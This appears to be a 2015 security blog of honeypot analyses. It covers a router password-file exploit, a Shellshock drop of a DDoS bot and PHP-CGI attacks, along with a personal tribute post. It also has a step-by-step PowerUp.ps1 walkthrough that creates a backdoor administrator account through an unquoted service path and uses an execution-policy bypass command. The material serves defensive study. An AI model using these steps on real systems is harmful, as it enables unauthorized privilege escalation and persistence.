Saturday, March 28, 2015

What's in the honeypot? CVE-2014-4019 - Attack on SOHO Router to Download Admin Password

Looking at the honeypots one more time today I found the miscreants searching for an unprotected router configuration that provides the username and password.  By utilizing the router it has been known that they can modify the DNS settings of these routers to conduct man-in-the-middle attacks intercepting or relaying all traffic through their servers.

Below is the log entry that I found:

According to the exploit published by exploit-db located here by requesting, through a GET request, the rom-0 file contains the admin username and password.  Then in the following link are instructions how to decompress the file.

The following CVE's have been recorded for these vulnerabilities that have been identified:
CVE-2014-4018
CVE-2014-4019
CVE-2014-4154
CVE-2014-4155
Also applicable is http://www.exploit-db.com/exploits/33737

Here is an article by SC Magazine about 300,000 SOHO routers that were compromised due to this vulnerability: http://www.scmagazine.com/attackers-alter-dns-configurations-remotely-compromise-300k-routers/article/336792/

I am also interested in the IP Address that touched the honeypot looking for this vulnerability.  IP Address is 95.213.143.180.  Looking at ripe.net the following record is pulled:


When you search for this IP Address on http://www.virustotal.com nothing comes up about this IP Address. 

However, as you search the web you find a history for this IP Address as shown below:

https://twitter.com/atma_es/status/575725495708479488
http://www.blocklist.de/en/view.html?ip=95.213.143.180

If you do a reverse DNS lookup no PTR records are identified.  



What's in the honeypot? Shellshock to Remote Control / DDoS Bot

Today in searching through what is gathered in the honeypots we found yet another attempt attempt at executing commands through the Shellshock vulnerability.  Below is the log that we are going to look at closer.


Looking at the information provided in the log above we gather the following 2 IP Addresses.

222.66.95.253 - Using APNIC.net the below information is returned about the IP Address
descr:CHINANET shanghai province network
descr:China Telecom
descr:No1,jin-rong Street
descr:Beijing 100032
country:CN


61.160.212.172 - Using APNIC.net the below information is returned about the IP Address
descr:CHINANET jiangsu province network
descr:China Telecom
descr:A12,Xin-Jie-Kou-Wai Street
descr:Beijing 100088
country:CN
Inside the User Agent where they are executing the command through the shellshock vulnerability is the download of a file called java. After downloading this file you can see that it is a "ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped"

If we look at the strings of this file we are able to pull out a few artifacts of interest.  The first is an email address of "keld@dkuug.dk".  This email is probably not related to the malware, possibly is referenced in a library that they use inside of the malware.

Then looking at the strings you can identify what the malware after it is executed is being used for:

It appears that this is being used on a Linux server to play a part in DDoS attacks.  You can see the Attack on UDP (Possilby NTP), SYN attack, ICMP Attack, DNS, DNS Amplification attacks, and others.  Then in the strings you come across a list of IP Addresses.  As I looked at a few of these addresses they appeared to be in Asia.

58.22.96.6658.240.57.3358.241.208.4658.242.2.259.51.78.210
60.191.244.561.10.0.13061.10.1.13061.128.114.13361.128.114.166
61.128.128.6861.128.192.6861.130.254.3461.132.163.6861.134.1.4
61.139.2.6961.139.39.7361.139.54.6661.147.37.161.166.150.101
61.166.150.12361.166.150.13961.166.25.12961.177.7.161.187.98.3
61.187.98.661.233.9.6161.233.9.961.234.254.561.235.164.13
61.235.164.1861.235.70.9861.236.93.3361.31.1.161.31.233.1
61.60.224.361.60.224.5101.47.189.10101.47.189.18112.100.100.100
112.4.0.55113.111.211.22114.114.114.114114.114.115.115116.228.111.118
118.29.249.50118.29.249.54119.233.255.228119.6.6.6122.72.33.240
124.161.97.234124.161.97.238124.161.97.242124.207.160.110139.175.10.20
139.175.150.20139.175.252.16139.175.55.244168.95.1.1168.95.192.1
168.95.192.174180.168.255.18202.100.192.68202.100.199.8202.100.96.68
202.101.107.85202.101.224.68202.101.226.68202.101.6.2202.101.98.55
202.102.128.68202.102.134.68202.102.152.3202.102.154.3202.102.192.68
202.102.199.68202.102.200.101202.102.213.68202.102.224.68202.102.227.68
202.102.24.34202.102.3.141202.102.3.144202.102.7.90202.102.8.141
202.102.9.141202.103.0.117202.103.0.68202.103.176.22202.103.224.68
202.103.225.68202.103.243.112202.103.24.68202.103.44.150202.103.96.112
202.106.0.20202.106.195.68202.106.196.115202.106.196.212202.106.196.228
202.106.196.230202.106.196.232202.106.196.237202.106.46.151202.112.112.10
202.112.144.30202.113.16.10202.113.16.11202.114.0.242202.114.240.6
202.115.32.36202.115.32.39202.117.96.10202.117.96.5202.118.1.29
202.118.1.53202.14.67.14202.14.67.4202.175.3.3202.175.3.8
202.193.64.33202.196.64.1202.203.128.33202.203.144.33202.203.160.33
202.203.192.33202.203.208.33202.203.224.33202.38.64.1202.45.84.58
202.45.84.67202.60.252.8202.85.128.32202.96.103.36202.96.104.15
202.96.104.26202.96.107.27202.96.128.166202.96.128.68202.96.128.86
202.96.134.133202.96.134.33202.96.144.47202.96.154.15202.96.209.133
202.96.209.5202.96.64.68202.96.69.38202.96.75.68202.96.86.18
202.96.96.68202.97.224.68202.97.7.17202.97.7.6202.98.0.68
202.98.192.67202.98.198.167202.98.224.68202.98.5.68202.98.96.68
202.99.104.68202.99.160.68202.99.166.4202.99.168.8202.99.192.66
202.99.192.68202.99.224.67202.99.224.8202.99.96.68203.142.100.18
203.142.100.21203.186.94.20203.186.94.241203.80.96.9210.200.211.193
210.200.211.225210.21.196.6210.21.3.140210.21.4.130210.38.192.33
210.42.241.1211.103.13.101211.136.112.50211.136.150.66211.136.17.107
211.136.28.231211.136.28.234211.136.28.237211.137.160.185211.137.160.5
211.137.241.34211.137.32.178211.138.106.19211.138.145.194211.138.151.161
211.138.156.66211.138.164.6211.138.180.2211.138.200.69211.138.240.100
211.138.242.18211.138.245.180211.138.75.123211.138.91.1211.139.1.3
211.139.2.18211.139.29.150211.139.29.170211.139.29.68211.139.73.34
211.140.197.58211.141.16.99211.141.90.68211.142.210.100211.142.210.98
211.147.6.3211.161.158.11211.161.159.3211.162.61.225211.162.61.235
211.162.61.255211.162.62.1211.162.62.60211.78.130.1211.90.72.65
211.90.80.65211.91.88.129211.92.136.81211.92.144.161211.93.0.81
211.93.24.129211.93.64.129211.95.193.97211.95.1.97211.95.72.1
211.97.64.129211.97.96.65211.98.121.27211.98.2.4211.98.4.1
211.98.72.7218.104.111.114218.104.111.122218.104.128.106218.104.32.106
218.104.78.2218.106.127.114218.106.127.122218.108.248.219218.108.248.245
218.2.135.1218.201.17.2218.202.152.130218.203.101.3218.203.160.194
218.30.19.40218.30.19.50218.6.200.139218.76.192.100218.85.152.99
218.85.157.99218.89.0.124219.141.136.10219.141.140.10219.141.148.37
219.141.148.39219.146.1.66219.147.1.66219.147.198.230219.148.204.66
219.149.194.55219.149.6.99219.150.32.132219.235.127.1219.239.26.42
219.72.225.253220.168.208.3220.168.208.6220.170.64.68221.11.132.2
221.12.1.227221.12.33.227221.130.252.200221.130.32.100221.130.32.103
221.130.32.106221.130.32.109221.130.33.52221.130.33.60221.131.143.69
221.176.3.70221.176.3.73221.176.3.76221.176.3.79221.176.3.83
221.176.3.85221.176.4.12221.176.4.15221.176.4.18221.176.4.21
221.176.4.6221.176.4.9221.228.255.1221.232.129.30221.3.131.11
221.4.66.66221.5.203.86221.5.203.90221.5.203.98221.5.88.88
221.6.4.66221.7.1.20221.7.128.68221.7.136.68221.7.34.10
221.7.92.86221.7.92.98222.172.200.68222.221.5.240222.222.222.222
222.243.129.81222.246.129.80222.45.0.110222.45.1.40222.46.120.5
222.47.29.93222.47.62.142222.52.118.162222.75.152.129222.85.85.85
222.88.88.88

Looking at the IP Addresses I am not sure if these are targets of the DDoS, IP Addresses to avoid, or just a list of IP Addresses they decided to place in the malware.

Upon executing the malware it makes a static connection over port 25000 back to the IP Address that the malware came from.


The malware also copies itself into /usr/bin and creates a hidden file called .sshd.

After uploading the malware to virustotal its initial detection went back to early March.  It confirmed my theory of it being a tool used in DDoS and to remotely control the server.  If you would like to go to the information on virustotal.com click here.

Also in the research I found that it was trying to do a DNS lookup for the following domain lzj.passwd1.com
This domain on virustotal is flagged and you can see the results here.

Looking at the parent domain of passwd1.com you identify that it is related to other activity that is flagged by virustotal.

You also learn that it is registered at godaddy.com.  The above information can be found here.  Looking at the history of this domain it has an interesting past going back to June 6, 2014.







Wednesday, March 25, 2015

What's in the honeypot? SSH Scanning leads to Interesting Domain

SSH scanning appears to be a popular activity for a honeypot to capture.  I thought I would share what I have seen in my honeypots thus far.

Below are the top 10 IP Addresses that have scanned my honeypots with the number of occurrences they appear in the logs:
1: 103.41.124.109 - 2,390
2: 103.41.124.64 - 2,332
3: 103.41.124.38 - 2,125
4: 58.218.211.166 - 2,104
5: 113.195.145.12 - 1,728
6: 103.41.124.65 - 1,683
7: 182.100.67.112 - 1,604
8: 113.195.145.80 - 1,555
9: 59.47.0.152 - 1,472
10: 103.41.124.28 - 1,371

These statistics were pulled from multiple honeypots into a single file and then I wrote the below python script to aggregate the total number of occurrences:

#!/usr/bin/python

priorLine=''
priorCalc=0
file = open('stats.temp', 'r')
for line in file:
item = line.split(' ')
if priorLine == item[0]:
priorLine = item[0]
priorCalc = priorCalc + int(item[1])
else:
print priorLine + " " + str(priorCalc)
priorLine = item[0]
priorCalc=int(item[1])

From the top 10 IP addresses above I wanted to see if any of them appeared in more than 1 honeypot. Surprisingly enough the below 3 IP Addresses appeared in more than 1:
103.41.124.109
58.218.211.166
182.100.67.112

Using a whois lookup on these IP Addresses the below information can be derived.  Again the information returned does not provide attribution in any way to the country or owners of the IP Addresses.

IP Address: 103.41.124.109
IP Range: 103.41.124.0 - 103.41.124.255
Description: HEETHAI LIMITED
Country: CN (China)

IP Address: 58.218.211.166
IP Range: 58.208.0.0 - 58.223.255.255
Description: CHINANET jiangsu province network
Description: China Telecom
Country: CN

IP Address: 182.100.67.112
IP Range: 182.96.0.0 - 182.111.255.255
Description: CHINANET JIANGXI PROVINCE NETWORK
Description: China Telecom
Country: CN

I also wanted to see if these IP Addresses showed up in virustotal as serving malware or having a history of malicious websites associated with them:

IP Address: 103.41.124.109 came back with no malicious domains being associated so far.

IP Address: 58.218.211.166 came back with the following information:
IP Address: 182.100.67.112 came back with the following information:

From the above research about the IP Addresses we identify some domains and URL's of interest. First I am going to look at the registrations of the domains:

IP Address: 58.218.211.166
Domain: a1.33lc.com
By searching for this domain the following IP Addresses over time have been associated with it.
It appears in the above listing the most recent URL utilized for this domain is currently pointing to IP Address 222.187.225.118.  After looking at this IP Address I wanted to see if the last file uploaded from that domain still existed.  Sure enough the below file I could still download:

Finding that the file was an APK or an Android package I pulled it down.  An APK file is nothing more than a zip file.  We are looking for the dex file inside of the APK so I unzipped it with the following command:

Checksum of APK: 77696c5fc37ce4881a319c1b962b74f1
unzip sosmap_android.apk classes.dex

Then with the classes.dex file I needed to extract the Java source code.  I can convert the dex file to Java class files by executing the following command:

Checksum of the dex file: fee0756c47a10382161d720083342c65
dex2jar classes.dex

This creates the following file of classes_dex2jar.jar.  Then the jar file can also be unzipped at this point-in-time.  

The decompiled jar file has a checksum of the following: 06538782eaa69970f54b59f1d30c60bc

Well I have chased this down the rabbit hole as far as I want to go.  Enjoy!


   






Monday, March 23, 2015

What's in the honeypot? Banner Information Gathering System by gatech.edu

I have been watching for a while the IP Address of 128.61.240.66 which would appear in the logs almost everyday as shown in the picture below:

Noticing the URL or what appears to be a URL in the banner.  I wanted to know more about this scan or these scan occurrences.  First I googled and then I visited the site and this is what you see upon visiting "http://netscan.gtisc.gatech.edu":

I find this project intriguing that they are collecting the banners and then monitoring them as they change.  This would provide information of patches that are deployed to webservers, up-time, and change amongst the web servers.  I thought I would go a little further and try and find if they release this information on their website at https://gtisc.gatech.edu/index.html.

From the links provided at this site I could not find this information but I did find the following links to be of interest:

Emerging Cyber Threats Report 2015 

2014 Georgia Tech Cyber Security Summit






Sunday, March 22, 2015

What's in the honeypot? "The Moon" malware is self-replicating and impacts Linksys E Routers - CVE-2013-5122

As I was looking through the logs of the honeypot I found the following occurring:



Well if you google "/tmUnblock.cgi" you find that this scan is related to "The Moon" malware.  This malware impacts Linksys E series routes that are used by multiple home users.  After a Linksys E series router is infected it will then scan and try and find other routers that are vulnerable and infect them.
Since this malware came out Linksys has since patched the vulnerability but to implement it a firmware update has to be done on the router.  Well, maybe the IP addresses that are scanning my honeypot are infected Linksys routers.

Well without actually scanning them I will not know if they are vulnerable, but I thought I would look up using arin.net or other registrars to see if the network the IP is on indicates it possibly could be based on being a residential ISP or a small business.

103.30.91.46 - PT Metroptix Lintas Nusa - Indonesia
173.89.8.170 - RRMA Time Warner Cable - US
74.143.224.154 - Insight Communications Corp - US
174.45.250.19 - Net-Core-BB-3 - Charter Communications - US
50.20.209.110 - CBeyond Communications LLC - US
173.18.39.9 - MediaCom Communications Corp - US
 
Again I am not sure but looking at the subnet ranges it appears that all but one is possibly a residential ISP or a small business.

Well if the router is infected with this malware, this is an indicator that the router can be used to cause a DDoS attack or be in a mesh of other devices to cover the tracks of miscreants causing trouble.  

Here is the link to the vulnerability as described by Cisco who owns Linksys:  http://tools.cisco.com/security/center/viewAlert.x?alertId=32899

The link to the CVE that describes the vulnerability is located here:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5122

Saturday, March 21, 2015

What's in the honeypot? CVE-2012-1823 execute arbitrary code in PHP before 5.3.12 and 5.4.x before 5.4.2

I thought I would create a series of posts about what I have collected and will collect in my honeypot that is running.  This is again only meant for educational purposes, and as I discuss what is found I am not attributing it to anyone.

Here is one of the first items that I would like to touch on:

The POST request to the honeypot was not found and displayed the 404 error.  However, I wanted to understand what was hex encoded.  I dug back into my archive and found my hex decoder at the following link.

Notice also that when I copy the hex encoded pattern the letters are in upper-case and my decoder is in lower-case.  So I found a quick sed command to convert the letters to lower-case, as shown below.


After I decoded the hex I found the following text:


Ok noticing that the -d looks to be an option.  So I did a search for PHP options.  

So from the above command switch it appears that they are trying to change the php.ini entries.  Then after a little more searching the following exploit published to exploit-db came up addressing CVE-2012-1823.  The exploit is located here.

Evaluating the pststr() variable that is created it matches the same patterns as I have seen in the honeypot.

Also reading about the exploit you find that the payload is actually in the POST data that is sent with the web request.  The description of the vulnerability as posted on the CVE page is, "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case".

Friday, March 6, 2015

The One Who Inspired My Career in Computers passed on Recently

The man who inspired me at an early age to get into computers, recently died, so I would like to take a moment and post about him.  I will refer to him as @brothersthree through-out this post.  Just prior to his passing I received from him multiple items that he continued to maintain in his possession.

@brothersthree went to college and during his time their he became familiar with computers and took an interest in them.  He decided to take some classes in which he would have to rent time on the mainframe to complete his assignments.  The access to the mainframe was limited based on seats and scheduling.  Most of the scheduling was taken up due to those advanced further in their collegiate courses.  The times that were available were often during late hours of the night or early in the morning hours.

Then a telephone line or modem access was made available to the mainframe, again this was limited to number of connections but alleviated some of the congestion.  I am not sure if at this time or before he purchased a Kaypro II computer.


I remember barely the clicky keyboard, with large 5 1/4 drives, and a handle on the back to carry it.  Out of curiosity I had to look up the type of processor and memory that it had.  According to Wikipedia it contained a 2.5Mhz Zilog Z80 Processor with 64kb of RAM.  I remember being allowed to use Wordstar on the computer and thinking how amazing it was.

As a young child I had dreams of working on this multiple times and was drawn to the click of the keyboard and the display of what I was typing on the screen.  After a small period of time and I am not sure if it was on his KayPro or a new 8086/8088 that he introduced me to what I consider my first computer programming language.  I was introduced to Turbo Pascal.  In the items I received from him was a 5 1/4 disc of Turbo Pascal version 3.01.

In this language, he wrote one of the first personal checkbook programs for the computer.  Amongst the items was version 4.0 of the checkbook programs source code that had been printed.  
This program and probably others inspired @brothersthree to start a software company called "Brothers Three Software".  At the time of when I imagine version 1 came about in 1987-89 it was a foreign concept to most people to store your checkbook on a computer.  His efforts to market and sell this software never took off in his mind, however, I bet it inspired multiple people that he spoke with, well maybe it was only me.

Amongst the items I received were the original MS-DOS 6.22 disks as shown below:
Windows 3.11 3 1/4 discs, Windows 95, Windows 98 SE Boot Disc and Windows 98 SE install CD.



Also in the items were a few old sticks of memory as shown below:

He always had a passion for computers through-out his life.  I remembered and found a letter that he sent to me in early January 2000 about the impact of the Y2K bug:

"The Y2K bug died with very little things happening.  One state in October sent car titles out that were [made in the year] 2000 cars, but the state computer put them as [made in the year] 1900 cars and listed them as antiques.  So the state made the corrections.

The only real trouble with computers was in Delaware, where at the stroke of midnight a big computer went down.  The only thing it caused was 800 slot machines would not work, so the casino was not able to get any more money from the slots." 

This man, @brothersthree, inspired me at the age of about 7 years of age to get into computers.  One of the first computer books that he introduced me too was the following:


I learned a little Turbo Pascal, progressed into BASIC, and then into Visual Basic and now into VBA, PHP, Visual Studio Products, Python, Bash, Perl, and many others.  May the legend of @brothersthree live on as being an early pioneer of computers and computer programming in Turbo Pascal.



Monday, March 2, 2015

Utilizing PowerUp.ps1 to Escalate Privileges on Windows 7 using an Unquoted Path Vulnerability

I found a great write-up by the Veris Group on how to use PowerUp.ps1 @ http://www.verisgroup.com/2014/06/17/powerup-usage/.  I thought I would take some time and walk through this tutorial on a Windows 7 box with a non-privileged user.

Following the Veris groups instructions:

1. I downloaded the PowerUp.ps1 script from their github repo at https://github.com/HarmJ0y/PowerUp.  Notice as of Dec 2014 this repo is no longer supported.

2. Drop the file PowerUp.ps1 into a location you can write to.  I have a folder I created called c:\PowerUp.

3. Then execute "powershell.exe -nop -exec bypass" to enable the execution bypass.

4. Then execute "import-module c:\PowerUp\powerup.ps1" of the full path plus the filename of the powershell script.

5. To setup the stage of having a vulnerable service to demonstrate with, I modified the following registry key to allow for an unquoted path vulnerability.


6. I removed the quotes around the path listed in the ImagePath of the registry.  Sometimes this is as easy as checking to see if your user can modify these paths on any service that has started.

7. Then I modified the permissions to the VMWare folder to where the user can read/write to the directory.

8.  With that the service normally it does not start automatically so I changed it to start automatically.


9. Now with this setup we can utilize the PowerUp.ps1 script to create a user account using this service.  

10. Using powerup.ps1 we now execute "Invoke-AllChecks".  The first check that it runs is for an unquoted path vulnerability and it finds the one that we setup.


11. Then we create the file that will create the backdoor account by the following command:

12.  The service.exe file was created now we copy that file into the directory of "C:\Program Files\VMWare" and call it VMWare.exe.  It will execute instead of going into the directory of "VMWare Tools".  However we do not have access to restart this service so we need to wait for the user to reboot the machine.  However, with limited access you could generate some errors for the user which would give them an indication that it needed to be rebooted.

13.  After the workstation restarted then the service loads as the local service account and  creates the account "backdoor" as an administrator on the workstation.


This is only one method of exploiting the unquoted path vulnerability on a workstation or server to gain administrative privileges on the computer.











Sunday, March 1, 2015

Extract List of IP Addresses from a File using grep

I have run into multiple occurrences where I only want to see the IP Addresses in a given file.  Today I found with the help of Command Line Fu a quick way to parse a file and only return the unique IP Addresses found:

cat tmp.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq

Sometimes I will use this to quickly parse out IP Addresses in an email.  The regulary expression can be changed to extract domain names out of an email also.


Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...